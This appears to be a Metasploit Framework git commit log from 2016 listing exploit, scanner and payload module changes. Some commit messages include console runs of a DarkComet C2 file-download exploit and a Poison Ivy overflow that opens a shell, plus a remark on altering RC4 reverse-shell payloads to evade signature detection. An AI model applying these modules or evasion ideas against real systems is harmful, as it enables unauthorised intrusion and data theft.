earthquake
5f4153308c
one line aligned to the others, space replaced to tabx
2016-06-09 20:52:20 +02:00
wchen-r7
207d92a125
Use scan to do regex capture
2016-06-09 11:07:00 -05:00
wchen-r7
1b4a6a7981
Use the UDP mixin to it can cleanup properly
2016-06-09 11:04:50 -05:00
Crypt0-M3lon
233186c833
Check presence in local admin group
...
As the "is_admin?" function only checks if the current session effectively has admin rights, I offer to add a check to know if the current user is in the local admin group using the "is_in_admin_group?" function. This information is better suited to check if admin rights are obtainable using the "bypassuac" module.
2016-06-09 17:47:09 +02:00
samvartaka
ba6d00cee2
This module exploits a publicly known vulnerability in the C2 server of DarkComet versions 3.2 and up
...
(https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/PEST-CONTROL.pdf ) which allows
an attacker to download arbitrary files from the DarkComet C2. The vulnerability possibly affects versions
prior to 3.2 as well. The vulnerability can be exploited without knowledge of the shared secret key
by abusing a flaw in the cryptographic protocol to carry out a limited version of the exploit allowing
for key recovery, after which the exploit can be used to download arbitrary files from a DarkComet C2 server.
See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware
for details.
See https://mega.nz/#!wlZkSJLK!NI_Z-9UoPBQ0MDEYXLVr1wUJyVV70qVprWqSUol_53k
for the DarkComet 5.3.1 C2 server / builder
See https://mega.nz/#!AxRmkQLb!MVjwua3qrzgyXq7vUWSxISwVE7vQ8rEJbexieb8s0Ro
for the DarkComet 4.2F C2 server / builder (archive password is 'tr')
## Console output
Below is an example of the exploit running against versions 5.3.1 and 4.2F
(DarkComet C2 server password is set to 'darkcometpass' and unknown to attacker).
### Version 5.3.1 (unknown password)
```
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options
Module options (auxiliary/gather/darkcomet_filedownloader):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTETIMEOUT 1 no Timeout (in seconds) for bruteforce attempts
KEY no DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
LHOST 0.0.0.0 yes This is our IP (as it appears to the DarkComet C2 server)
NEWVERSION true no Set to true if DarkComet version >= 5.1, set to false if version < 5.1
RHOST 0.0.0.0 yes The target address
RPORT 1604 yes The target port
STORE_LOOT true no Store file in loot (will simply output file to console if set to false).
TARGETFILE no Target file to download (assumes password is set)
msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102
LHOST => 192.168.0.102
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - C2 server uses password [darkcometpass]
[*] 192.168.0.104:1604 - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC51#-890darkcometpass
KEY => #KCMDDC51#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - omgsecret
[*] Auxiliary module execution completed
```
### Version 4.2F (unknown password)
```
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options
Module options (auxiliary/gather/darkcomet_filedownloader):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTETIMEOUT 1 no Timeout (in seconds) for bruteforce attempts
KEY no DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
LHOST 0.0.0.0 yes This is our IP (as it appears to the DarkComet C2 server)
NEWVERSION true no Set to true if DarkComet version >= 5.1, set to false if version < 5.1
RHOST 0.0.0.0 yes The target address
RPORT 1604 yes The target port
STORE_LOOT true no Store file in loot (will simply output file to console if set to false).
TARGETFILE no Target file to download (assumes password is set)
msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102
LHOST => 192.168.0.102
msf auxiliary(darkcomet_filedownloader) > set NEWVERSION false
NEWVERSION => false
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - Missing 1 bytes of keystream ...
[*] 192.168.0.104:1604 - Initiating brute force ...
[*] 192.168.0.104:1604 - C2 server uses password [darkcometpass]
[*] 192.168.0.104:1604 - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC42F#-890darkcometpass
KEY => #KCMDDC42F#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - omgsecret
[*] Auxiliary module execution completed
```
2016-06-09 14:42:25 +02:00
ssyy201506
d470371694
fix the available size of payload for exploit/windows/local/payload_injection
2016-06-09 13:40:25 +09:00
wchen-r7
7cdadca79b
Land #6945 , Add struts_dmi_rest_exec exploit
2016-06-08 23:16:46 -05:00
h00die
6f5edb08fe
pull uri from datastore consistently
2016-06-08 20:28:36 -04:00
William Vu
37efff59ce
Land #6949 , hash fix for filezilla_client_cred
2016-06-08 15:21:03 -05:00
wchen-r7
f0bb125556
Should be print_error
2016-06-08 14:22:36 -05:00
William Vu
600704c053
Merge remote-tracking branch 'upstream/pr/6939'
2016-06-08 14:22:33 -05:00
wchen-r7
52bcade72c
Fix #6948 , Modules using the SMB client are printing peer twice
...
Fix #6948
2016-06-08 12:16:50 -05:00
wwebb-r7
ab27c1b701
Merge pull request #6940 from samvartaka/master
...
Exploit for previously unknown stack buffer overflow in Poison Ivy versions 2.1.x (possibly present in older versions too)
2016-06-08 11:25:51 -05:00
Adam Compton
158176aa05
replaced "if !" on line 41 with "unless"
...
replaced "$1" on line 51 with "Regexp.last_match(1)
restructed the print statement on line 56 to more closely match suggestion
removed "self." from line 71
changed line 78 to loop for 2 seconds insetead of 1 second
2016-06-08 09:28:08 -04:00
Crypt0-M3lon
eaaa9177d5
Fix "username" key to add login in creds database
2016-06-08 10:38:38 +02:00
wchen-r7
f13d91f685
Fix a prob of printing an empty rhost from the scanner mixin
2016-06-07 19:19:39 -05:00
wchen-r7
e8304e684c
Bring #6793 up to date with upstream-master
2016-06-07 19:04:32 -05:00
wchen-r7
6ae4d1576e
Apply fixes to symantec_brightmail_ldapcreds.rb
2016-06-07 19:01:58 -05:00
samvartaka
5260031991
Modifications based on suggestions by @wchen-r7
2016-06-08 01:17:15 +02:00
Adam Compton
75a34c4aca
added a new aux module to quickly scan for Jenkins servers on the local broadcast network by sending out a udp packet to port 33848 on the broadcast address. Any Jenkins server should respond with XML data containing the Jenkins server version.
2016-06-07 16:57:06 -04:00
dmohanty-r7
9450906ca4
Correctly set Dummy param
2016-06-07 14:42:51 -05:00
dmohanty-r7
f47128ccdd
Cleanup canon_irav_pwd_extract module
2016-06-07 14:31:37 -05:00
Brendan Watters
c4aa99fdac
Land #6925 , ipfire proxy exec
2016-06-07 10:24:59 -05:00
Brendan Watters
7e84c808b2
Merge remote-tracking branch 'upstream/pr/6924' into dev
2016-06-07 09:24:25 -05:00
wchen-r7
b59d10d9c4
Land #6929 , Add HP Data Protector Encrypted Comms exploit
2016-06-06 22:45:53 -05:00
wchen-r7
60c60bf004
Minor cosmetic changes
2016-06-06 22:45:00 -05:00
Vex Woo
e4c55f97db
Fix module desc
2016-06-06 10:40:36 -05:00
Vex Woo
9f19d2c210
add apache struts2 S2-033 rce module
2016-06-06 05:07:48 -05:00
amarionette
4354b5d5d6
Changed class from Metasploit3 to MetasploitModule
2016-06-03 17:43:41 -07:00
amarionette
99790e343d
Removed debug statement
2016-06-03 17:36:00 -07:00
h00die
c2699ef194
rubocop fixes
2016-06-03 17:43:11 -04:00
h00die
2f837d5d60
fixed EDB spelling
2016-06-03 17:17:36 -04:00
h00die
8d76bdb8af
fixed EDB reference
2016-06-03 17:13:36 -04:00
Brendan Watters
d7cd10f586
Suggested updates for style and clarity
2016-06-03 14:04:58 -05:00
Brendan Watters
91658d2a61
Changes per rubocop and sinn3r
2016-06-03 12:42:38 -05:00
samvartaka
8ca571aee3
no message
2016-06-03 19:29:55 +02:00
samvartaka
0114d2cf0b
This module exploits a publicly known vulnerability in the C2 server of DarkComet versions 3.2 and up
...
(https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/PEST-CONTROL.pdf ), possibly affecting
earlier versions as well. The vulnerability can be exploited without knowledge of the secret key
by abusing a flaw in the cryptographic protocol to carry out a limited version of the exploit allowing
for key recovery after which the exploit can be used to download arbitrary files from a DarkComet C2 server.
See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware
for details.
## Console output
Below is an example of the exploit running against versions 5.3.1 and 4.2F
(DarkComet C2 server password is set to 'darkcometpass' and unknown to attacker).
### Version 5.3.1 (unknown password)
```
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options
Module options (auxiliary/gather/darkcomet_filedownloader):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTETIMEOUT 1 no Timeout (in seconds) for bruteforce attempts
KEY no DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
LHOST 0.0.0.0 yes This is our IP (as it appears to the DarkComet C2 server)
NEWVERSION true no Set to true if DarkComet version >= 5.1, set to false if version < 5.1
RHOST 0.0.0.0 yes The target address
RPORT 1604 yes The target port
STORE_LOOT true no Store file in loot (will simply output file to console if set to false).
TARGETFILE no Target file to download (assumes password is set)
msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102
LHOST => 192.168.0.102
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - C2 server uses password [darkcometpass]
[*] 192.168.0.104:1604 - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC51#-890darkcometpass
KEY => #KCMDDC51#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - omgsecret
[*] Auxiliary module execution completed
```
### Version 4.2F (unknown password)
```
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options
Module options (auxiliary/gather/darkcomet_filedownloader):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTETIMEOUT 1 no Timeout (in seconds) for bruteforce attempts
KEY no DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
LHOST 0.0.0.0 yes This is our IP (as it appears to the DarkComet C2 server)
NEWVERSION true no Set to true if DarkComet version >= 5.1, set to false if version < 5.1
RHOST 0.0.0.0 yes The target address
RPORT 1604 yes The target port
STORE_LOOT true no Store file in loot (will simply output file to console if set to false).
TARGETFILE no Target file to download (assumes password is set)
msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102
LHOST => 192.168.0.102
msf auxiliary(darkcomet_filedownloader) > set NEWVERSION false
NEWVERSION => false
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - Missing 1 bytes of keystream ...
[*] 192.168.0.104:1604 - Initiating brute force ...
[*] 192.168.0.104:1604 - C2 server uses password [darkcometpass]
[*] 192.168.0.104:1604 - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC42F#-890darkcometpass
KEY => #KCMDDC42F#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - omgsecret
[*] Auxiliary module execution completed
```
2016-06-03 19:24:56 +02:00
samvartaka
290e1eb0fa
This module exploits a previously unknown stack buffer overflow vulnerability
...
in Poison Ivy versions 2.1.x (possibly present in older versions too) and doesn't
require knowledge of the secret key as it abuses a flaw in the cryptographic protocol.
Note that this is a different vulnerability from the one affecting versions 2.2.0 and up
(https://www.rapid7.com/db/modules/exploit/windows/misc/poisonivy_bof ).
See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware
for details.
## Console output
Below is an example of the exploit running against a 2.1.4 C2 server (PIVY C2 server password is
set to 'pivypass' and unknown to attacker).
### Version 2.1.4
```
msf > use windows/misc/poisonivy_21x_bof
msf exploit(poisonivy_21x_bof) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf exploit(poisonivy_21x_bof) > check
[*] 192.168.0.104:3460 The target appears to be vulnerable.
msf exploit(poisonivy_21x_bof) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(poisonivy_21x_bof) > exploit
[*] 192.168.0.104:3460 - Performing handshake...
[*] Started bind handler
[*] 192.168.0.104:3460 - Sending exploit...
[*] Command shell session 1 opened (192.168.0.102:56272 -> 192.168.0.104:4444) at 2016-06-03 12:34:02 -0400
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.1.4\Poison Ivy 2.1.4>
```
2016-06-03 19:20:06 +02:00
Brent Cook
5420848c49
Land #6922 , add popen() additional vector to ImageMagick exploit (imagemagick_delegate)
2016-06-03 08:06:07 -05:00
Brent Cook
f034952852
Land #6918 , Added additional SAP TCP/IP ports into the sap_port_info function.
2016-06-03 08:01:04 -05:00
Brent Cook
d371fd0798
Land #6885 , add aux control module for PhoenixContact PLCs
2016-06-03 07:50:39 -05:00
wchen-r7
f333481fb8
Add vendor patch info
2016-06-02 16:41:06 -05:00
wchen-r7
7c9227f70b
Cosmetic changes for magento_unserialize to pass msftidy & guidelines
2016-06-02 16:34:41 -05:00
dmohanty-r7
a15c79347b
Add canon printer credential harvest module
...
Praedasploit
2016-06-02 16:07:28 -05:00
William Vu
9128ba3e57
Add popen() vuln to ImageMagick exploit
...
So... we've actually been sitting on this vuln for a while now. Now that
the cat's out of the bag [1], I'm updating the module. :)
Thanks to @hdm for his sharp eye. ;x
[1] http://permalink.gmane.org/gmane.comp.security.oss.general/19669
2016-06-02 11:35:37 -05:00
mr_me
4f42cc8c08
Added module
2016-06-02 09:24:10 -05:00
h00die
68d647edf1
Merge branch 'master' of https://github.com/rapid7/metasploit-framework into op5
2016-06-01 18:05:18 -04:00
h00die
52d5028548
op5 config exec
2016-06-01 15:07:31 -04:00
a-marionette
7f92088242
Revised the SQL query for the exploits/unix/webapps/joomla_content_history_sqli_rce.rb. The exploit is now working for me.
2016-06-01 09:47:32 -07:00
root
d72492fe30
Add support for older Data Protector versions
...
Increases support by enabling all SSL ciphers. Some older versions
of DP only support weaker export ciphers not enabled by default.
2016-06-01 10:45:47 +01:00
sho-luv
98cfcc65ae
Added IP address to returned information.
...
This scanner module doesn't tell you the location of the found information. So when using the -R option to fill the RHOSTS all you get is a bunch of successful findings, however you won't know to which systems they belong.
2016-05-31 19:47:00 -07:00
Ian Lovering
eb2398a446
Renamed hp_dataprotector_encrypted_comms
...
Renamed to match other data protector exploits
2016-05-31 22:58:32 +01:00
Ian Lovering
54c4771626
Exploit for HP Data Protector Encrypted Comms
...
Added exploit for HP Data Protector when using encrypted communications.
This has been tested against v9.00 on Windows Server 2008 R2 but should also work against older versions of DP.
2016-05-31 22:44:14 +01:00
wchen-r7
fb678564b1
Land #6923 , Check the correct check code for ms13_081_track_popup_menu
2016-05-31 11:40:02 -05:00
h00die
8ce59ae330
travis fixes
2016-05-31 05:46:20 -04:00
h00die
057947d7e8
ipfire proxy exec
2016-05-30 10:24:17 -04:00
h00die
9b5e3010ef
doc/module cleanup
2016-05-30 06:33:48 -04:00
h00die
df55f9a57c
first add of ipfire shellshock
2016-05-29 20:40:12 -04:00
Tijl Deneut
2afcda9d49
Did some more rubocopy work and
...
added module documentation
2016-05-28 15:32:18 +02:00
wchen-r7
504a94bf76
Technically, this is form auth, not http auth
2016-05-27 18:39:25 -05:00
wchen-r7
14adcce8bf
Missed the HTTPUSERNAME fix
2016-05-27 18:37:04 -05:00
wchen-r7
61f9cc360b
Correct casing - should be HttpUsername and HttpPassword
2016-05-27 18:31:54 -05:00
wchen-r7
7f643a7b8d
Fix syntax error
2016-05-27 18:05:24 -05:00
wchen-r7
4dcddb2399
Fix #4885 , Support basic and form auth at the same time
...
When a module uses the HttpClient mixin but registers the USERNAME
and PASSWORD datastore options in order to perform a form auth,
it ruins the ability to also perform a basic auth (sometimes it's
possible to see both). To avoid option naming conflicts, basic auth
options are now HTTPUSERNAME and HTTPPASSWORD.
Fix #4885
2016-05-27 16:25:42 -05:00
Bruno Morisson
01a691a46c
Update sap_router_portscanner.rb
...
Added additional SAP TCP/IP ports for sap_port_info function.
ref: https://wiki.scn.sap.com/wiki/display/TCPIP/Services
2016-05-27 14:43:16 +01:00
wchen-r7
fb95abc645
Land #6909 , Add WordPress Ninja Forms unauthenticated file upload
2016-05-25 15:40:10 -05:00
wchen-r7
14e1baf331
Minor style changes
2016-05-25 15:39:26 -05:00
rastating
19c4d5b02b
Remove hard coded target path
2016-05-25 18:04:26 +01:00
William Webb
028b1ac251
Land #6816 Oracle Application Testing Suite File Upload
2016-05-24 18:27:10 -05:00
William Vu
3dfdf1d936
Land #6528 , tilde expansion and more for OptPath
2016-05-24 16:01:59 -05:00
Jon Hart
48c25dd863
Remove need for expand_path in this module; normalize handles it now
2016-05-24 13:30:12 -07:00
Jon Hart
3df4c38e82
Use correct key file var
2016-05-24 13:28:08 -07:00
Brendan Watters
77a62ff7c0
Land #6905 RC4 Stagers
2016-05-24 09:34:32 -05:00
Brendan Watters
af86d63498
Updated Cache size
2016-05-24 09:07:05 -05:00
Brendan Watters
f0b945e4c4
Updated cache size
2016-05-24 09:06:46 -05:00
Brendan Watters
d328258db4
Updated Cache size
2016-05-24 09:06:28 -05:00
Brent Cook
5c6b93c1cf
Land #6883 , Add Ubiquiti airOS exploit
2016-05-24 07:26:40 -05:00
William Vu
ca76e8f290
Update allwinner_backdoor report_vuln hash
2016-05-24 00:57:37 -05:00
Brent Cook
5bf8891c54
Land #6882 , fix moodle_cmd_exec HTML parsing to use REX
2016-05-23 23:25:22 -05:00
Brent Cook
266d29ca4a
handle garbage better during probe
2016-05-23 22:28:31 -05:00
Brent Cook
a6020ca010
style fixes
2016-05-23 22:14:57 -05:00
Brent Cook
928a706135
Land #6890 , Allwinner CPU kernel module local privilege escalation
2016-05-23 22:00:52 -05:00
Brent Cook
2f8562fba4
added documentation and minor style tweaks
2016-05-23 21:59:44 -05:00
rastating
adb8098b8c
Fix typo
2016-05-24 00:16:04 +01:00
rastating
aae7c25603
Add WordPress Ninja Forms unauthenticated file upload module
2016-05-23 23:47:41 +01:00
h00die
4242bbdf55
change report_note to report_vuln per note
2016-05-23 17:36:50 -04:00
Brent Cook
2694907b79
update cached payload size
2016-05-23 14:30:43 -05:00
RageLtMan
cf62218139
Update payload sizes
2016-05-23 14:27:11 -05:00
RageLtMan
efc64eaa5f
Implement reverse_tcp_rc4_dns payload in metasm
...
Using the ruby methods for generating assembly blocks defined or
separated in prior commits, create a new payload from the existing
assembly blocks which performs a DNS lookup of the LHOST prior to
establishing a corresponding socket and downloading, and
decrypting the RC4 encrypted payload.
For anyone looking to learn how to build these payloads, these
three commits should provide a healthy primer. Small changes to
the payload structure can yield entropy enough to avoid signature
based detection by in-line or out-of-band static defenses. This
payload was completed in the time between this commit and the last.
Testing:
Win2k8r2
ToDo:
Update payload sizes when this branch is "complete"
Ensure UUIDs and adjacent black magic all work properly
2016-05-23 14:27:11 -05:00
RageLtMan
0e69040a6a
Implement reverse_tcp_dns as metasm payload
...
Using the separation of block_recv and reverse_tcp, implement
reverse_tcp_dns using original shellcode as template with dynamic
injection of parameters. Concatenate the whole thing in the
generation call chain, and compile the resulting shellcode for
delivery.
Metasploit module pruned to bare minimum, with the LHOST OptString
moved into the library component.
Testing:
Win2k8r2
ToDo:
Update payload sizes when this branch is "complete"
Ensure UUIDs and adjacent black magic all work properly
Misc:
Clean up rc4.rb to use the rc4_keys method when generating a
stage. Makes the implementation far more readable and reduces
redundant code.
2016-05-23 14:27:11 -05:00
RageLtMan
df2346d9e0
Implement RC4 metasm payloads for tcp bind and rev
...
Convert reverse_tcp_rc4 and bind_tcp_rc4 from static shellcode
substitution payloads to metasm compiled assembly approach.
Splits up metasm methods for bind_tcp and reverse_tcp into socket
creation and block_recv to allow for reuse of the socket methods
with the RC4 payloads, while substituting the block_recv methods
for those carrying the appropriate decryptor stubs.
Creates a new rc4 module carrying the bulk of the decryptor and
adjacent convenince methods for standard payload generation.
Testing:
Tested against Win2k8r2, Win7x64, and WinXPx86
ToDo:
Ensure all the methods around payload sizing, UUIDs, and other
new functionality, the semantics of which i do not yet fully
understand, are appropriate and do not introduce breakage.
2016-05-23 14:27:11 -05:00
Spencer McIntyre
7e34d1e1cf
Land #6897 , use sendall python rtcp shell with ssl
2016-05-21 16:51:10 -04:00
William Vu
6581fbd294
Add note about "mf" malware
...
This is the malware I found upon shelling my friend's device.
2016-05-20 23:09:10 -05:00
Brent Cook
b613dfefb4
Land #6896 , fix spelling in caidao_bruteforce_login
2016-05-19 21:54:06 -05:00
root
a71e853c2a
Fixed cache size for python/shell_reverse_tcp_ssl
2016-05-20 02:32:37 +00:00
root
87398d5195
Fixed python reverse shell ssl send for EOF occurred in violation of protocol error
2016-05-20 01:49:04 +00:00
wchen-r7
506356e15d
Land #6889 , check #nil? and #empty? instead of #empty?
2016-05-19 19:23:04 -05:00
wchen-r7
99a573a013
Do unless instead "if !" to follow the Ruby guideline
2016-05-19 19:21:45 -05:00
h00die
706d51389e
spelling fix
2016-05-19 19:30:18 -04:00
William Vu
a16f4b5167
Return nil properly in rescue
...
Missed this because I copypasta'd myself.
2016-05-19 15:35:38 -05:00
William Vu
d018bba301
Store SSH key as a note
...
I know, I know, it should use the creds model. >:[
2016-05-19 15:12:58 -05:00
William Vu
9f738c3e41
Add note about overwritten files
2016-05-19 15:07:27 -05:00
William Vu
8fccb26446
Add Ubiquiti airOS exploit
...
Thanks to my friend wolf359 for providing a test device!
2016-05-19 14:50:20 -05:00
ssyy201506
31bbcfca49
Fix ms13_081_track_popup_menu
2016-05-19 17:22:47 +09:00
h00die
c621f689b2
more descriptive note per @sempervictus
2016-05-18 19:08:01 -04:00
Vex Woo
b5284375a7
osb_uname_jlist - NoMethodError undefined method 'empty?' for nil:NilClass
2016-05-18 00:16:53 -05:00
Vex Woo
11fedd7353
ca_totaldefense_regeneratereports - NoMethodError undefined method 'empty?' for nil:NilClass
2016-05-18 00:15:28 -05:00
Vex Woo
a6405beeda
ams_hndlrsvc - NoMethodError undefined method 'empty?' for nil:NilClass
2016-05-18 00:13:40 -05:00
Vex Woo
41bcdcce61
fix struts_code_exec_exception_delegator - NoMethodError undefined method 'empty?' for nil:NilClass
2016-05-18 00:11:57 -05:00
Vex Woo
bc257ea628
fix struts_code_exec - NoMethodError undefined method 'empty?' for nil:NilClass
2016-05-18 00:10:32 -05:00
Vex Woo
68b83c6e3a
datastore['CMD'].blank?
2016-05-17 23:56:59 -05:00
h00die
815a2600a8
additional description
2016-05-17 22:07:33 -04:00
h00die
640e0b9ff7
working ready for pr
2016-05-17 21:58:32 -04:00
Vex Woo
a4e7e373f3
fix ams_xfr.rb - NoMethodError undefined method 'empty?' for nil:NilClass
2016-05-17 17:55:18 -05:00
Tijl Deneut
36a9ef83ab
Added phoenix_command.rb
2016-05-17 15:45:45 +02:00
wchen-r7
e8ac568352
doesn't look like we're using the tcp mixin
2016-05-17 03:15:26 -05:00
wchen-r7
08394765df
Fix #6879 , REXML::ParseException No close tag for /div
2016-05-17 03:14:00 -05:00
William Vu
9c61490676
Fix some inconsistencies
...
Failed to catch these while editing. :(
2016-05-17 02:50:12 -05:00
Jon Hart
92d07f74ff
Remove unnecessary double expand_path
2016-05-16 17:34:12 -07:00
Jon Hart
8bccfef571
Fix merge conflict
2016-05-16 17:29:45 -07:00
Brent Cook
cf0176e68b
Land #6867 , Add Dell SonicWALL Scrutinizer 11.0.1 MethodDetail SQL Injection
2016-05-16 19:00:10 -05:00
Vex Woo
4a4904149b
ruby conditional operator -> expression
2016-05-16 10:45:04 -05:00
Vex Woo
4a3ab9d464
add a module for netcore/netdis udp 53413 backdoor
2016-05-16 02:11:53 -05:00
wchen-r7
3ea2f62376
Land #6875 , update description for auxiliary/spoof/nbns/nbns_response
2016-05-15 12:34:53 -05:00
wchen-r7
8e85e8f9d7
Land #6859 , Add TP-Link sc2020n Module
2016-05-15 12:33:54 -05:00
sho-luv
5361aaadbd
Update nbns_response.rb
...
Just correcting the description section of this module
2016-05-14 15:24:38 -07:00
Brent Cook
21d74a64fe
Land #6874 , Improve exploit for CVE-2016-0854
2016-05-14 11:08:17 -05:00
Brent Cook
0d176f2c92
remove a couple of unnecessary ternary ops
2016-05-14 11:07:43 -05:00
Brent Cook
c7cbaa08c8
Land #6576 , add Search Engine Subdomains Collector (Bing / Yahoo / ..)
2016-05-14 10:50:53 -05:00
Brent Cook
2e3e4f0069
Land #6296 , Added a multi-platform post module to generate TCP & UDP egress traffic
2016-05-14 00:03:00 -05:00
Brent Cook
3542d907f7
simplify description, move the bulk of documentation to documentation/
2016-05-14 00:01:51 -05:00
Brent Cook
8ce0365c7f
See rapid7/metasploit-payloads#98 , update cached payload sizes
2016-05-13 23:05:34 -05:00
Brent Cook
d398419971
Land #6832 , Check LHOST value before running shell_to_meterpreter, add docs
2016-05-13 22:50:22 -05:00
h00die
314d73546c
additional details, not working on tablet via malicious apk meterpreter
2016-05-13 23:12:44 -04:00
Brent Cook
a940481f62
Land #6834 , Authorized FTP JCL exploit for z/OS
2016-05-13 21:29:45 -05:00
Brent Cook
5c494480e6
handle failure more gracefully
2016-05-13 21:29:25 -05:00
wchen-r7
3b5db26ff5
Fix #6872 , change upload action for CVE-2016-0854 exploit
...
This patch includes the following changes:
* Instead of the uploadFile action, this patch uses uploadImageCommon
to be able to support both Advantech WebAccess builds: 2014 and
2015.
* It uses an explicit check instead of the passive version check.
* It cleans up the malicious file after getting a session.
* Added module documentation to explain the differences between
different builds of Advantech WebAccess 8.0s, and 8.1.
Fix #6872
2016-05-13 19:47:18 -05:00
h00die
5099124f3d
module compiles, fails correctly but cant yet verify it works
2016-05-12 22:18:43 -04:00
Bigendian Smalls
2d5cf6cfe4
Authorized FTP JCL exploit for z/OS
...
This exploit module allows a user with credentials to execute JCL on a
vulnerable mainframe system running z/OS and an appropriately configured
FTP server.
2016-05-12 14:46:31 -05:00
Brent Cook
a69432abe5
update module class and move to recon from manage
2016-05-12 12:42:04 -05:00
Brent Cook
9f923cdb00
Merge branch 'master' into land-6296-egress
2016-05-12 12:36:47 -05:00
wchen-r7
8f9762a3e5
Fix some comments
2016-05-12 00:19:18 -05:00
wchen-r7
da293081a9
Fix a typo
2016-05-11 22:48:23 -05:00
wchen-r7
9d128cfd9f
Add Dell SonicWALL Scrutinizer 11.0.1 MethodDetail SQL Injection
2016-05-11 22:27:18 -05:00
Nicholas Starke
4b23d2dc58
Adjusting exception handling
...
This commit adjusts the error handling to close the socket before
calling fail_with and adds specific exceptions to catch
2016-05-11 17:18:51 -05:00
HD Moore
32e1a19875
Fix up the disclosure date
2016-05-11 00:18:22 -05:00
HD Moore
ded79ce1ff
Fix CVE syntax
2016-05-10 23:18:45 -05:00
HD Moore
4a5d150716
Fixups to continue supporting Rails 4.2.x
2016-05-10 23:12:48 -05:00
HD Moore
04bb493ccb
Small typo fixed
2016-05-10 23:07:51 -05:00
Nicholas Starke
32ae3e881e
Adding save_cred and exception handling to module
...
This commit adds a save_cred method for saving off the credentials
upon a successful login attempt. Also, exception handling surrounding
the opening of the telnet socket has been added to avoid any accidental
resource leaking.
2016-05-10 20:54:44 -05:00
HD Moore
7c6958bbd8
Rework rails_web_console_v2_code_exec to support CVE-2015-3224
2016-05-10 11:08:02 -05:00
wchen-r7
3db72e9b4b
Land #6853 , use send_request_cgi! for CVE-2016-0854 exploit
2016-05-09 16:10:04 -05:00
Brent Cook
57a3a2871b
remove various session manipulation hacks since session.platform should always contain an os identifier
2016-05-08 22:39:41 -05:00
Nicholas Starke
8eb3193941
Adding TP-Link sc2020n Module
...
This module exploits a command injection vulnerability in
TP-Link sc2020n network video cameras in order to start the
telnet daemon on a random port. The module then connects to
the telnet daemon, which returns a root shell on the device.
2016-05-08 14:02:50 -05:00
Kyle Gray
2a546d191f
Land #6854 , smtp header fix
...
Fixes an issue with duplicate headers when sending emails.
Fixes MS-1476
2016-05-06 12:07:12 -05:00
William Vu
2abb062070
Clean up module
2016-05-06 11:51:29 -05:00
David Maloney
e4e6246692
Merge branch 'master' of github.com:rapid7/metasploit-framework
2016-05-06 10:55:52 -05:00
Louis Sato
8dc7de5b84
Land #6838 , add Rails web-console module
2016-05-05 15:53:52 -05:00
William Vu
1bc2ec9c11
Update vulnerable versions to include 6.x (legacy)
2016-05-05 14:18:42 -05:00
William Vu
26b749ff5a
Add default LHOST
...
This is a massive workaround and probably shouldn't be done. :-)
2016-05-05 14:18:42 -05:00
William Vu
5c713d9f75
Set default payload
...
Land #6849 for this to be effective.
